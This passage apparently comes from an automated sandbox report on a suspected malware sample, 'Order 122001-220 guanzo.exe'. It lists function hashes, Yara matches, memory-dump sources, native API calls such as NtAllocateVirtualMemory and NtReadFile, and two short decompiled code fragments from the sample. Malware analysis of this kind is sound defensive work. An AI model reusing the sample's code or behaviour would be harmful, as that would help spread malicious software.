                                                                        • Opcode ID: a5ed14de41b8faa5a53f858525565a5665e757576473376055e1df18f831fdf1
                                                                        • Instruction ID: 781d32b7f1c4183e4f791dcb472d387ebc3499286d417ab6cb36fcb2ef179450
                                                                        • Opcode Fuzzy Hash: a5ed14de41b8faa5a53f858525565a5665e757576473376055e1df18f831fdf1
                                                                        • Instruction Fuzzy Hash: EE216B70E15649DFDB48CFAAD8942DFFBF3AFC9200F14C07AC508AA215E7705A468B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB3440, Relevance: .1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1970fae06cac352a731a8499aab0ff32e44a5b6720099961727947eedadf258a
                                                                        • Instruction ID: 15794b4cfc8c9c631b5fa956e7c6398754c82af4d72be7d010e37261458cdee6
                                                                        • Opcode Fuzzy Hash: 1970fae06cac352a731a8499aab0ff32e44a5b6720099961727947eedadf258a
                                                                        • Instruction Fuzzy Hash: AF210871E11619DBDB08CFABD9406DEFBF7BBC8200F14C02AD508AB214EB345A458F91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Analysis Process: Order 122001-220 guanzo.exe PID: 5676 Parent PID: 864 Order 122001-220 guanzo.exeCOMMON

                                                                        Executed Functions

                                                                        Function 0041826A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 25%
                                                                        			E0041826A(signed int __eax, void* __edx, void* __edi, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t21;
				void* _t32;
				intOrPtr* _t34;
				void* _t36;

				_t32 = __edi - 1;
				asm("cmpsb");
				 *(__edx - 5) =  *(__edx - 5) & __eax;
				_t16 = _a4;
				_t34 = _a4 + 0xc48;
				E00418DC0(_t32, _a4, _t34,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
				_t8 =  &_a32; // 0x413d52
				_t14 =  &_a8; // 0x413d52
				_t21 =  *((intOrPtr*)( *_t34))( *_t14, _a12, _a16, _a20, _a24, _a28,  *_t8, _a36, _a40, 0x8bec8b55, _t36); // executed
				return _t21;
			}







                                                                        0x0041826a
                                                                        0x0041826b
                                                                        0x0041826c
                                                                        0x00418273
                                                                        0x0041827f
                                                                        0x00418287
                                                                        0x00418292
                                                                        0x004182ad
                                                                        0x004182b5
                                                                        0x004182b9

                                                                        APIs
                                                                        • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID: R=A$R=A
                                                                        • API String ID: 2738559852-3742021989
                                                                        • Opcode ID: 62d60fb5dd3eacb1576381a1b6cc61bacb18de5c99fbeab877ace006a6a6b6e4
                                                                        • Instruction ID: ebc89adc19509f38eaacf94272f55c7feec8d1b69a62f348563172bb044c10d1
                                                                        • Opcode Fuzzy Hash: 62d60fb5dd3eacb1576381a1b6cc61bacb18de5c99fbeab877ace006a6a6b6e4
                                                                        • Instruction Fuzzy Hash: F3F01DB6114149ABCB04DF98D894CEBBBA9FF8C354B15878DFD5C97202C634EC558BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 37%
                                                                        			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                        0x00418273
                                                                        0x0041827f
                                                                        0x00418287
                                                                        0x00418292
                                                                        0x004182ad
                                                                        0x004182b5
                                                                        0x004182b9

                                                                        APIs
                                                                        • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID: R=A$R=A
                                                                        • API String ID: 2738559852-3742021989
                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                        • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                        • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004181BC, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 5307474825cd8e66656a307a80e88224dd1c1e60fd1869cddec59822e3164bf9
                                                                        • Instruction ID: d762fb2db014eb627c0b73c0f32ef6c6772fa739a57ca419a0c343087aab13c9
                                                                        • Opcode Fuzzy Hash: 5307474825cd8e66656a307a80e88224dd1c1e60fd1869cddec59822e3164bf9
                                                                        • Instruction Fuzzy Hash: 92F0C4B2200108AFCB08CF88DC94EEB37A9AF8C354F15864CFA0D97240C630E855CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004182EC, Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: b4af973ab9df2f1f83a86398b7bf47c8b29d517c95ba7550161fd9d1121d55c9
                                                                        • Instruction ID: e7010d775404e26488b1f9ba7be8b831d0a2b441666e9574549967ff22f0878f
                                                                        • Opcode Fuzzy Hash: b4af973ab9df2f1f83a86398b7bf47c8b29d517c95ba7550161fd9d1121d55c9
                                                                        • Instruction Fuzzy Hash: 80D02BAD00D2C04FDB10FBB474C10C67B40DEA121831459CFD4A807643C524920593D1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041839B, Relevance: 1.5, APIs: 1, Instructions: 18memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: 53bae83d86ce14e6d13f08a541d24fd329580ece7d709ff19f9138e962ba465a
                                                                        • Instruction ID: 6e5cee6a04b86537ac699d5078897a4e9a9742e5c477a43f627ec682158b8773
                                                                        • Opcode Fuzzy Hash: 53bae83d86ce14e6d13f08a541d24fd329580ece7d709ff19f9138e962ba465a
                                                                        • Instruction Fuzzy Hash: FDD0A7B21491486BC718CFD5ACC0CB377ECDFD8620708858FFD594600AC431A4148F70
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 019299A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 543913ec5c372887f4ab3246f84590100ba18f54384f7a095e9d5e4aa9a58780
                                                                        • Instruction ID: 9816c5c99cc2938753fd47addb6c34bfd29b686931307a244d208e6967aa8e9c
                                                                        • Opcode Fuzzy Hash: 543913ec5c372887f4ab3246f84590100ba18f54384f7a095e9d5e4aa9a58780
                                                                        • Instruction Fuzzy Hash: 739002A175110442D10061994424B064085E7E1342F91C015E1094554DC659CC627166
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 019295D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 0615fedf8518b748efdb4554da09ef64cfc744839e0848ec9226f33df8f679f7
                                                                        • Instruction ID: 02d98754f289c7b5ea5734b7b03eb5fa5787f5b7a61e957be974c2f2169b3e4a
                                                                        • Opcode Fuzzy Hash: 0615fedf8518b748efdb4554da09ef64cfc744839e0848ec9226f33df8f679f7
                                                                        • Instruction Fuzzy Hash: 5E9002A161210003410571994424616808AA7E0242B91C021E1044590DC56588A17165
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01929910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 7d9864bbceb43c1f6103767d510e25e7df34d035aa18a70a8da8989a183836ca
                                                                        • Instruction ID: 642664d10c91f25429115b1bc575b4b295c224b4e3b0b80292eacaf06fa3ca5f
                                                                        • Opcode Fuzzy Hash: 7d9864bbceb43c1f6103767d510e25e7df34d035aa18a70a8da8989a183836ca
                                                                        • Instruction Fuzzy Hash: BB9002B161110402D140719944147464085A7D0342F91C011A5094554EC6998DE576A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01929540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: cc4042c8bf3950038aa019812b84e55fb82c3bfddeabdda6fa7b15a876e636b2
                                                                        • Instruction ID: d9083f295f5969e24348860615b89c130e1c3060d969fdcbcc7beb067ed7d344
                                                                        • Opcode Fuzzy Hash: cc4042c8bf3950038aa019812b84e55fb82c3bfddeabdda6fa7b15a876e636b2
                                                                        • Instruction Fuzzy Hash: 32900265621100030105A599071450740C6A7D5392391C021F1045550CD66188716161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 019298F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: db80aa1d3e8a9f7263c701abba4ef70735b001ef8864021ca07454038d090382
                                                                        • Instruction ID: be532aef141b15316eccf9d50521497873ccb3a3f856b0155bc180befa8b470b
                                                                        • Opcode Fuzzy Hash: db80aa1d3e8a9f7263c701abba4ef70735b001ef8864021ca07454038d090382
                                                                        • Instruction Fuzzy Hash: ED900261A1110502D10171994414616408AA7D0282FD1C022A1054555ECA6589A2B171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01929840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 7618a8225548c726161c7ecb83133d50d7aaeb83b07f6ea42125a1f4f0853e38
                                                                        • Instruction ID: d5cd38a782bff297636f626da30448c558f72e63a3858a583a4ae4b64047997b
                                                                        • Opcode Fuzzy Hash: 7618a8225548c726161c7ecb83133d50d7aaeb83b07f6ea42125a1f4f0853e38
                                                                        • Instruction Fuzzy Hash: 39900261652141525545B19944145078086B7E02827D1C012A1444950CC5669866E661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01929860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: ad0467ecb9ea126c4a925687fb00c996e9da50568872fa40c15f8de6a27d3e51
                                                                        • Instruction ID: 5211fe55fd01cef94ff738a2f5491d7f0b1c81bea76c8ddedeca647ea4681540
                                                                        • Opcode Fuzzy Hash: ad0467ecb9ea126c4a925687fb00c996e9da50568872fa40c15f8de6a27d3e51
                                                                        • Instruction Fuzzy Hash: D090027161110413D111619945147074089A7D0282FD1C412A0454558DD6968962B161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01929780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 93c70b7762418804db0720841b44032bc1b6abad4aced3646b372f8e99e8ac96
                                                                        • Instruction ID: 662dc823a522b830230e335a18741dd48f39c976e454a89fe39e975aa4faf906
                                                                        • Opcode Fuzzy Hash: 93c70b7762418804db0720841b44032bc1b6abad4aced3646b372f8e99e8ac96
                                                                        • Instruction Fuzzy Hash: BC90026962310002D1807199541860A4085A7D1243FD1D415A0045558CC95588796361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 019297A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: ce1da050c6a5e34e4282fcaa82b09ac81cc114ce908ca53511246790f8881f63
                                                                        • Instruction ID: 65802abd14dc17810118db1b656356f3411540c075276893d221ec6bcdfec9e1
                                                                        • Opcode Fuzzy Hash: ce1da050c6a5e34e4282fcaa82b09ac81cc114ce908ca53511246790f8881f63
                                                                        • Instruction Fuzzy Hash: 4290026171110003D140719954286068085F7E1342F91D011E0444554CD95588666262
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01929FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 970c2db13e23ca30ff51ef07f9b329267c26d1ac646f3736f4cfea37ce75d722
                                                                        • Instruction ID: cfdf180d8610aeb19a32096f73e07cfc880604372c2315287406f4deb505c5f4
                                                                        • Opcode Fuzzy Hash: 970c2db13e23ca30ff51ef07f9b329267c26d1ac646f3736f4cfea37ce75d722
                                                                        • Instruction Fuzzy Hash: BA90027172124402D110619984147064085A7D1242F91C411A0854558DC6D588A17162
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01929710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 8f127a774a21be541ea38796e366cce35ea6459ede9440ff7fab0ba03c43c2b1
                                                                        • Instruction ID: 12f81aad670a61805d5fde25088d283e673f11c22a273fecc7c51e41a4871261
                                                                        • Opcode Fuzzy Hash: 8f127a774a21be541ea38796e366cce35ea6459ede9440ff7fab0ba03c43c2b1
                                                                        • Instruction Fuzzy Hash: B590027161110402D10065D954186464085A7E0342F91D011A5054555EC6A588A17171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 019296E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f4fcdf26e2a61606ebaef09e5b21d85a3583a253727faace0cde2e7fb006f875
                                                                        • Instruction ID: 50175adb350f4b1363d098bb74b7d27bb5d5f8adcb16e5e3052df36b79d5a263
                                                                        • Opcode Fuzzy Hash: f4fcdf26e2a61606ebaef09e5b21d85a3583a253727faace0cde2e7fb006f875
                                                                        • Instruction Fuzzy Hash: 5B90027161118802D1106199841474A4085A7D0342F95C411A4454658DC6D588A17161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01929A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 98d1b92ac28de68a9f20e25935d53117136b1462d4cb2c21088589d2a17f5c9f
                                                                        • Instruction ID: ca71c6c52d67154afb9e63ed7d303b972ee6308b8b5f39a0631d30a2e459ce77
                                                                        • Opcode Fuzzy Hash: 98d1b92ac28de68a9f20e25935d53117136b1462d4cb2c21088589d2a17f5c9f
                                                                        • Instruction Fuzzy Hash: 3790027161150402D1006199482470B4085A7D0343F91C011A1194555DC665886175B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01929A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: e9d76cd30c624ebf76d21c1086db7036c82d3d30d89fba5490af5a3f30ac8ebc
                                                                        • Instruction ID: e0f96c419bcc80cab97d7361230747f33aec2c174329159f36cf6367aa8f843a
                                                                        • Opcode Fuzzy Hash: e9d76cd30c624ebf76d21c1086db7036c82d3d30d89fba5490af5a3f30ac8ebc
                                                                        • Instruction Fuzzy Hash: 17900261A1110042414071A988549068085BBE1252791C121A09C8550DC599887566A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01929A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 01b5e4e1f0c7d0065d5145386235ab809675ee0b5032e4785d245fb4a756524a
                                                                        • Instruction ID: 9a579c871b1cc3e27424d2e92b9c89ac691464df444d42ed9bdec631514e2280
                                                                        • Opcode Fuzzy Hash: 01b5e4e1f0c7d0065d5145386235ab809675ee0b5032e4785d245fb4a756524a
                                                                        • Instruction Fuzzy Hash: DE90026162190042D20065A94C24B074085A7D0343F91C115A0184554CC95588716561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01929660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 8d5f5560aecf97c07ce3b2702cd6c0390a4f8a1f7eb397a8b2a7c52e083641d7
                                                                        • Instruction ID: cdd2eec4020fea086f6a144f2455970ee5c7f47f7fbe583e1b3f496f5aa23b15
                                                                        • Opcode Fuzzy Hash: 8d5f5560aecf97c07ce3b2702cd6c0390a4f8a1f7eb397a8b2a7c52e083641d7
                                                                        • Instruction Fuzzy Hash: 5C90027161110802D1807199441464A4085A7D1342FD1C015A0055654DCA558A6977E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004088B0, Relevance: .1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                        • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                        • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                        • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
